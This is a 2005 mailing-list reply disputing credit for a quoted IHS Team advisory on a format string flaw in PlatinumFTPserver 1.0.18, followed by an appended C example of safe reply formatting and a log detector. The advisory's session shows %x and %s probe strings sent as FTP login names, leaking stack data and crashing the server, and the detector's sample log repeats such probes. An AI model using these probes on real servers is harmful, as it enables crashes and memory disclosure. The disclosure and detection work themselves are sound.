Re: PlatinumFTPserver format string vulnerability ( IHSTeam )
Actually, the credits don't go to you, these vulnerabilities have been found
already. I've replied recently to this mailing list in regards to this
software.
If you had disassembled the binary, then why not mention that the
vulnerability exists in a 3rd party ActiveX control, and not the software
itself?
My reply,
http://www.securityfocus.com/archive/1/393256/2005-03-13/2005-03-19/0
Please read the links below,
http://www.osvdb.org/displayvuln.php?osvdb_id=3461
http://secunia.com/advisories/9127/
http://secunia.com/advisories/10608/
http://secunia.com/advisories/9013/
-Gary H. Jones II
----- Original Message -----
From: <c0d3r@xxxxxxxxxxx>
To: <bugtraq@xxxxxxxxxxxxxxxxx>
Cc: <news@xxxxxxxxxxxxxx>
Sent: Wednesday, March 16, 2005 8:56 AM
Subject: PlatinumFTPserver format string vulnerability ( IHSTeam )
**********************************************************************
advisory URL : http://www.ihsteam.com/advisory/PlatinumFTPserver.txt
**********************************************************************
********************************************
IHS Iran Hackers Sabotage Public advisory
by : c0d3r "Kaveh Razavi" c0d3r@xxxxxxxxxxx
********************************************
Well, yesterday a guy found a simple user overflow in PlatinumFTPserver vr: 1.0.18 and prior.
I downloaded the package at :
http://www.roboshareware.com/products/PlatinumFTPserver.exe
and started to disassemble the vulnerability. He had written a DoS.
PlatinumFTP has got a good error-controlling system, so EIP overwrite is
not easy.
But I found another vulnerability when I was fuzzing.
The server is also vulnerable to a USER format string attack.
Here is the result:
---------------------------------------
C:\Documents and Settings\root>ftp
ftp> open 127.0.0.1
Connected to 127.0.0.1.
220-PlatinumFTPserver V1.0.18
220 Enter login details
User (127.0.0.1:(none)): user %x%x
331 Password required for user 026d0048.
Password:
---------------------------------------
ftp> user AAAA%x%x%x%x
331 Password required for user AAAA026d0048020313333.
Password:
---------------------------------------
ftp> user
AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%x%x%x%x
331 Password required for
AAAA026d00480203133337373615064726f7771657220657269756f662064414120727825414
1782578257825782578257825782578257825782578257825782578257825782578257825782
5782578257825782578257825782578257825782578257825782578257825782578257825782
5d2e782512000a77f5508212cdd812ce1012cdfc12cdb01305dc012ce00.
Password:
---------------------------------------
ftp> user AAAA%s%s
331 Password required for AAAAÈsÈjÈ{PÈ` .
Password:
---------------------------------------
ftp> user
AAAA%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s
hanging ==>
szAppName : PlatinumFTPserverEngine.exe szAppVer : 1.0.0.18
szModName : user32.dll szModVer : 5.1.2600.1106 offset : 00008f7f
The instruction at "0x01606feb" refrenced memory at "0xaf613daf". the
memory could not be "written".
---------------------------------------
and these kinda playing!
I am busy with university entrance exam stuff so I can't write the exploit
code, and really it doesn't cost.
Well, laters. And this will be the last sweet to IHS until my shitty exam.
All the credits go to IHSteam.com.
Greetz fly to: LorD and NT of ihsteam, Jamie of exploitdev.org and other
friends and security teams.
Well, I will come to u later shervin_kesafat, my great lamer!
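Added example, not code from the advisory, from either poster, or from PlatinumFTPserver itself: the session above shows the classic symptom of a user-controlled format string, the login name being echoed back with stack words substituted for each `%x`. The C below shows the reply built the safe way (the name passed as a `"%s"` argument instead of as the format) next to the input check a log-based detection rule would run over `USER` lines. The function names `build_user_reply`, `count_format_directives` and `count_suspicious_user_lines`, and the sample log lines, are hypothetical and constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical reply builder. The unsafe pattern that produces output like the
 * session above is passing the user-supplied name itself as the format string,
 * e.g. snprintf(out, outsz, user). Passing it as a "%s" argument, as here, means
 * a "%x" or "%s" inside the name is copied literally and never interpreted.
 * Returns the reply length, or -1 if it did not fit in outsz. */
int build_user_reply(char *out, size_t outsz, const char *user)
{
    int n = snprintf(out, outsz, "331 Password required for %s.", user);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* Count printf-style conversion directives in a USER argument. A legitimate
 * login name practically never contains one; a run of them is the probe pattern
 * seen in the advisory log. "%%" is a literal percent sign and is not counted. */
int count_format_directives(const char *s)
{
    int count = 0;
    size_t i = 0;
    while (s[i]) {
        if (s[i] != '%') { i++; continue; }
        i++;                                    /* step past the '%' */
        if (s[i] == '%') { i++; continue; }     /* "%%" -> literal '%' */
        /* skip flags, width, precision and length modifiers */
        while (s[i] && strchr("-+ #0123456789.*hlLqjzt", s[i])) i++;
        if (s[i] && strchr("diouxXeEfFgGaAcspn", s[i])) { count++; i++; }
        /* otherwise leave i on the unrecognised char so the loop re-examines it */
    }
    return count;
}

/* Scan log lines of the form "USER <name>" and return how many carry at least
 * one format directive: the check a detection rule over FTP logs would apply. */
int count_suspicious_user_lines(const char *const *lines, size_t n)
{
    int flagged = 0;
    for (size_t i = 0; i < n; i++) {
        if (strncmp(lines[i], "USER ", 5) != 0) continue;
        if (count_format_directives(lines[i] + 5) > 0) flagged++;
    }
    return flagged;
}

/* Constructed sample log, not taken from the advisory. */
static const char *const sample_log[] = {
    "USER alice",
    "USER user %x%x",
    "USER AAAA%x%x%x%x",
    "PASS secret",
    "USER bob%%",
    "USER AAAA%s%s",
};
#define SAMPLE_LOG_LEN (sizeof sample_log / sizeof sample_log[0])

int main(void)
{
    char reply[128];
    for (size_t i = 0; i < SAMPLE_LOG_LEN; i++) {
        if (strncmp(sample_log[i], "USER ", 5) != 0) continue;
        const char *name = sample_log[i] + 5;
        int d = count_format_directives(name);
        build_user_reply(reply, sizeof reply, name);
        /* the name is printed through "%s", so its directives stay literal */
        printf("%-20s directives=%d %s reply: %s\n",
               name, d, d ? "FLAG" : "ok  ", reply);
    }
    printf("flagged USER lines: %d\n",
           count_suspicious_user_lines(sample_log, SAMPLE_LOG_LEN));
    return 0;
}
```

With the safe builder, a name of `AAAA%x%x` comes back as exactly `331 Password required for AAAA%x%x.`, in contrast to the hex-filled replies in the session above; the directive counter is the signal to alert on, since ordinary login names do not contain conversion specifiers.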